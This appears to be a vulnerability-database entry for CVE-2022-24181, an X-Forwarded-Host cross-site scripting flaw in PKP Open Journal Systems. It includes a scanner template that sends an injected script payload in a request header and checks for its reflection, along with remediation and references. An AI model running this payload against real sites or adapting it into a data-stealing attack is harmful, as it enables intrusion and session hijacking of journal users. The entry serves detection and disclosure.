CVE-2022-24181: PKP Open Journal Systems 2.4.8-3.3 - Cross-Site Scripting

日期: 2025-08-01 | 影响软件: PKP Open Journal Systems | POC: 已公开

漏洞描述

PKP Open Journal Systems 2.4.8 to 3.3 contains a cross-site scripting vulnerability which allows remote attackers to inject arbitrary code via the X-Forwarded-Host Header.

PoC代码[已公开]

id: CVE-2022-24181

info:
  name: PKP Open Journal Systems 2.4.8-3.3 - Cross-Site Scripting
  author: lucasljm2001,ekrause
  severity: medium
  description: |
    PKP Open Journal Systems 2.4.8 to 3.3 contains a cross-site scripting vulnerability which allows remote attackers to inject arbitrary code via the X-Forwarded-Host Header.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement.
  remediation: |
    Upgrade to a patched version of PKP Open Journal Systems (OJS) or apply the necessary security patches provided by the vendor.
  reference:
    - https://www.exploit-db.com/exploits/50881
    - https://github.com/pkp/pkp-lib/issues/7649
    - https://youtu.be/v8-9evO2oVg
    - https://nvd.nist.gov/vuln/detail/cve-2022-24181
    - https://github.com/comrade99/CVE-2022-24181
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2022-24181
    cwe-id: CWE-79
    epss-score: 0.04352
    epss-percentile: 0.88531
    cpe: cpe:2.3:a:public_knowledge_project:open_journal_systems:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: public_knowledge_project
    product: open_journal_systems
    shodan-query: cpe:"cpe:2.3:a:public_knowledge_project:open_journal_systems"
  tags: cve,cve2022,xss,oss,pkp-lib,edb,public_knowledge_project,vuln

http:
  - raw:
      - |
        GET /iupjournals/index.php/esj HTTP/1.1
        Host: {{Hostname}}
        X-Forwarded-Host: foo"><script>alert(document.domain)</script><x=".com

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '<script>alert(document.domain)</script><x=".com/iupjournals'

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200
# digest: 490a0046304402206f52bbdafbd1bb15209ef2015f6886b00e7d71cd0ec85e679aacb5c7b4e1d4e1022068d63ebe2b11ff74e14563e483060eaa6908b2063748ab06f58e1fea04068f63:922c64590222798bb761d5b6d8e72950

相关漏洞推荐